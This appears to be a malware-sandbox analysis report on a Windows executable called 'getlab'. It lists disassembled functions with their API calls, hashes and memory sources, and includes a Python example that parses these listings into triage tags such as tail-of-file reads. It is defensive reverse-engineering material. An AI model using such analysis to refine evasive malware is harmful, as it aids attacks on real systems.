                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                          • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                          • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                          • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseHandleModuleProc
                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                          • API String ID: 4190037839-2401316094
                                                                          • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                          • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                          • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                          • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                          • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                          • String ID:
                                                                          • API String ID: 1694776339-0
                                                                          • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                          • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                          • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                          • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                            • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale$DefaultSystem
                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                          • API String ID: 1044490935-665933166
                                                                          • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                          • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                          • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                          • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                          • LocalFree.KERNEL32(006CEE88,00000000,00401AB4), ref: 00401A1B
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,006CEE88,00000000,00401AB4), ref: 00401A3A
                                                                          • LocalFree.KERNEL32(006CD330,?,00000000,00008000,006CEE88,00000000,00401AB4), ref: 00401A79
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID:
                                                                          • API String ID: 3782394904-0
                                                                          • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                          • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                          • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                          • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                          • ExitProcess.KERNEL32 ref: 00403DE5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ExitMessageProcess
                                                                          • String ID: Error$Runtime error at 00000000$9@
                                                                          • API String ID: 1220098344-1503883590
                                                                          • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                          • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                          • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                          • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 262959230-0
                                                                          • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                          • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                          • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                          • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID:
                                                                          • API String ID: 730355536-0
                                                                          • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                          • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                          • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                          • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID: )q@
                                                                          • API String ID: 3660427363-2284170586
                                                                          • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                          • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                          • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                          • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                          • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CommandHandleLineModule
                                                                          • String ID: U1hd.@
                                                                          • API String ID: 2123368496-2904493091
                                                                          • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                          • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                          • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                          • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                          APIs
                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 1458359878-0
                                                                          • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                          • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                          • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                          • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
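The per-function "APIs" blocks above are the most useful part of this listing for triage, but the format has two quirks worth handling explicitly. The argument list is a snapshot of the stack at the call site, so values past an API's documented parameter count are caller context rather than arguments (GetFileSize is listed with nine slots although it takes two, and the second slot of GetModuleHandleA at 0040704D is the string the following GetProcAddress consumes), and calls prefixed "Part of subcall function" belong to a callee, not to the listed function. The Python below is an added example written for this page, not Joe Sandbox code: it parses lines copied from this report into per-function call sequences, trims each call to its documented arity (the stack-window reading is an assumption of the example), and derives triage tags whose names are the example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: three "APIs" blocks copied from this report (refs 00403B1E,
# 00403D9D, 004053CE), kept with the section markers the report places around them.
SAMPLE_REPORT = """\
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
Memory Dump Source
APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
• ExitProcess.KERNEL32 ref: 00403DE5
Strings
Memory Dump Source
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
  • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
Memory Dump Source
"""

# "• Api.MODULE(args), ref: ADDR"; a "Part of subcall function X:" prefix marks a callee's call.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Documented parameter counts. Assumption: the plugin prints a window of the
# stack at call time, so slots past the arity are caller context, not arguments.
ARITY = {"CreateFileA": 7, "GetFileSize": 2, "SetFilePointer": 4, "ReadFile": 5,
         "SetEndOfFile": 1, "CloseHandle": 1, "MessageBoxA": 4, "ExitProcess": 1,
         "GetSystemDefaultLCID": 0, "GetLocaleInfoA": 4}


@dataclass
class Call:
    api: str
    module: str
    raw_args: List[str]              # every stack slot the report printed
    ref: str
    subcall_of: Optional[str] = None

    @property
    def args(self) -> List[str]:     # trimmed to the real parameters when known
        n = ARITY.get(self.api)
        return self.raw_args if n is None else self.raw_args[:n]


def parse_api_blocks(text: str) -> List[List[Call]]:
    """Group the report's call lines into one list per analysed function."""
    funcs, current, in_apis = [], [], False
    for line in text.splitlines():
        marker = line.strip()
        if marker == "APIs":
            in_apis, current = True, []
        elif marker in ("Memory Dump Source", "Strings"):
            if in_apis and current:
                funcs.append(current)
            in_apis, current = False, []
        elif in_apis and (m := CALL_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"]))
    if in_apis and current:
        funcs.append(current)
    return funcs


def to_int(slot: str) -> Optional[int]:
    try:                             # '?' (unknown) and string slots give None
        return int(slot, 16)
    except ValueError:
        return None


def tag_function(calls: List[Call]) -> set:
    """Triage tags from the call sequence; the tag names are this example's own."""
    apis = [c.api for c in calls]
    tags = set()
    if "MessageBoxA" in apis and "ExitProcess" in apis:
        tags.add("fatal_error_handler")
    for i, c in enumerate(calls):
        if c.api != "SetFilePointer" or len(c.args) < 4:
            continue
        distance, method = to_int(c.args[1]), to_int(c.args[3])
        # FILE_END (2) or a negative move followed by ReadFile: the function
        # reads the tail of the file, the usual way to load an appended overlay.
        if (method == 2 or (distance is not None and distance < 0)) \
                and any(x.api == "ReadFile" for x in calls[i + 1:]):
            tags.add("reads_file_tail")
    return tags


def summarize(text: str) -> List[dict]:
    return [{"entry_ref": calls[0].ref,
             "sequence": [c.api for c in calls if c.subcall_of is None],
             "subcalls": sorted({c.subcall_of for c in calls if c.subcall_of}),
             "tags": sorted(tag_function(calls))}
            for calls in parse_api_blocks(text)]
```

Running `summarize(SAMPLE_REPORT)` yields three records: the 00403B1E function is tagged `reads_file_tail` (the `SetFilePointer(-0x80)` then `ReadFile(0x80)` pair), the 00403D9D function `fatal_error_handler`, and the 004053CE function is reported with its own sequence `GetSystemDefaultLCID` and callee `004051FC` separated. The arity trimming is what makes the first two SetFilePointer calls comparable at all: untrimmed, the first one carries 13 stack slots.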

                                                                          Execution Graph

                                                                          Execution Coverage:16%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:4.5%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:69
                                                                          execution_graph 49750 402584 49751 402598 49750->49751 49752 4025ab 49750->49752 49780 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49751->49780 49754 4025c2 RtlEnterCriticalSection 49752->49754 49755 4025cc 49752->49755 49754->49755 49766 4023b4 13 API calls 49755->49766 49756 40259d 49756->49752 49758 4025a1 49756->49758 49759 4025d5 49760 4025d9 49759->49760 49767 402088 49759->49767 49762 402635 49760->49762 49763 40262b RtlLeaveCriticalSection 49760->49763 49763->49762 49764 4025e5 49764->49760 49781 402210 9 API calls 49764->49781 49766->49759 49768 40209c 49767->49768 49769 4020af 49767->49769 49788 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49768->49788 49770 4020c6 RtlEnterCriticalSection 49769->49770 49772 4020d0 49769->49772 49770->49772 49777 402106 49772->49777 49782 401f94 49772->49782 49773 4020a1 49773->49769 49774 4020a5 49773->49774 49774->49777 49777->49764 49778 4021f1 RtlLeaveCriticalSection 49779 4021fb 49778->49779 49779->49764 49780->49756 49781->49760 49785 401fa4 49782->49785 49783 401fd0 49787 401ff4 49783->49787 49794 401db4 49783->49794 49785->49783 49785->49787 49789 401f0c 49785->49789 49787->49778 49787->49779 49788->49773 49798 40178c 49789->49798 49792 401f29 49792->49785 49795 401e02 49794->49795 49796 401dd2 49794->49796 49795->49796 49821 401d1c 49795->49821 49796->49787 49801 4017a8 49798->49801 49800 4017b2 49817 401678 VirtualAlloc 49800->49817 49801->49800 49803 40180f 49801->49803 49806 401803 49801->49806 49809 4014e4 49801->49809 49818 4013e0 LocalAlloc 49801->49818 49803->49792 49808 401e80 9 API calls 49803->49808 49805 4017be 49805->49803 49819 4015c0 VirtualFree 49806->49819 49808->49792 49810 4014f3 VirtualAlloc 49809->49810 49812 401520 49810->49812 49813 401543 49810->49813 49820 401398 LocalAlloc 49812->49820 49813->49801 49815 40152c 
49815->49813 49816 401530 VirtualFree 49815->49816 49816->49813 49817->49805 49818->49801 49819->49803 49820->49815 49822 401d2e 49821->49822 49823 401d51 49822->49823 49824 401d63 49822->49824 49834 401940 49823->49834 49825 401940 3 API calls 49824->49825 49827 401d61 49825->49827 49828 401d79 49827->49828 49844 401bf8 9 API calls 49827->49844 49828->49796 49830 401d88 49831 401da2 49830->49831 49845 401c4c 9 API calls 49830->49845 49846 401454 LocalAlloc 49831->49846 49835 401966 49834->49835 49843 4019bf 49834->49843 49847 40170c 49835->49847 49839 401983 49840 40199a 49839->49840 49852 4015c0 VirtualFree 49839->49852 49840->49843 49853 401454 LocalAlloc 49840->49853 49843->49827 49844->49830 49845->49831 49846->49828 49848 401743 49847->49848 49849 401783 49848->49849 49850 40175d VirtualFree 49848->49850 49851 4013e0 LocalAlloc 49849->49851 49850->49848 49851->49839 49852->49840 49853->49843 53498 40d064 53499 40d06c 53498->53499 53500 40d096 53499->53500 53501 40d09a 53499->53501 53502 40d08f 53499->53502 53504 40d0b0 53501->53504 53505 40d09e 53501->53505 53511 406288 GlobalHandle GlobalUnlock GlobalFree 53502->53511 53512 40626c GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 53504->53512 53510 40625c GlobalAlloc GlobalLock 53505->53510 53508 40d0ac 53508->53500 53513 408cac 53508->53513 53510->53508 53511->53500 53512->53508 53514 408cb8 53513->53514 53521 406ddc LoadStringA 53514->53521 53517 403450 4 API calls 53518 408ce9 53517->53518 53519 403400 4 API calls 53518->53519 53520 408cfe 53519->53520 53520->53500 53522 4034e0 4 API calls 53521->53522 53523 406e09 53522->53523 53523->53517 53524 44b4a0 53525 44b4ae 53524->53525 53527 44b4cd 53524->53527 53525->53527 53528 44b384 53525->53528 53529 44b3b7 53528->53529 53539 414ae0 53529->53539 53531 44b3ca 53532 44b3f7 73A1A570 53531->53532 53533 40357c 4 API calls 53531->53533 53543 41a1e0 53532->53543 53533->53532 53536 44b428 53551 44b0b8 53536->53551 53538 44b43c 73A1A480 53538->53527 53540 414aee 
53539->53540 53541 4034e0 4 API calls 53540->53541 53542 414afb 53541->53542 53542->53531 53544 41a2a7 53543->53544 53545 41a20b 53543->53545 53546 403400 4 API calls 53544->53546 53548 403520 4 API calls 53545->53548 53547 41a2bf SelectObject 53546->53547 53547->53536 53549 41a263 53548->53549 53550 41a29b CreateFontIndirectA 53549->53550 53550->53544 53552 44b0cf 53551->53552 53553 44b162 53552->53553 53554 44b0e2 53552->53554 53555 44b14b 53552->53555 53553->53538 53554->53553 53557 402648 4 API calls 53554->53557 53556 44b15b DrawTextA 53555->53556 53556->53553 53558 44b0f3 53557->53558 53559 44b111 MultiByteToWideChar DrawTextW 53558->53559 53560 402660 4 API calls 53559->53560 53561 44b143 53560->53561 53561->53538 53562 448720 53563 448755 53562->53563 53564 44874e 53562->53564 53565 448769 53563->53565 53566 448524 7 API calls 53563->53566 53568 403400 4 API calls 53564->53568 53565->53564 53567 403494 4 API calls 53565->53567 53566->53565 53570 448782 53567->53570 53569 4488ff 53568->53569 53571 4037b8 4 API calls 53570->53571 53572 44879e 53571->53572 53573 4037b8 4 API calls 53572->53573 53574 4487ba 53573->53574 53574->53564 53575 4487ce 53574->53575 53576 4037b8 4 API calls 53575->53576 53577 4487e8 53576->53577 53578 431bc8 4 API calls 53577->53578 53579 44880a 53578->53579 53580 431c98 4 API calls 53579->53580 53587 44882a 53579->53587 53580->53579 53581 448880 53594 44232c 53581->53594 53582 448868 53582->53581 53606 4435c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53582->53606 53586 4488b4 GetLastError 53607 4484b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53586->53607 53587->53582 53605 4435c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53587->53605 53589 4488c3 53608 443608 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53589->53608 53591 4488d8 53609 443618 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53591->53609 53593 4488e0 53595 442365 53594->53595 53596 44330a 53594->53596 53597 403400 4 API calls 53595->53597 53598 403400 4 
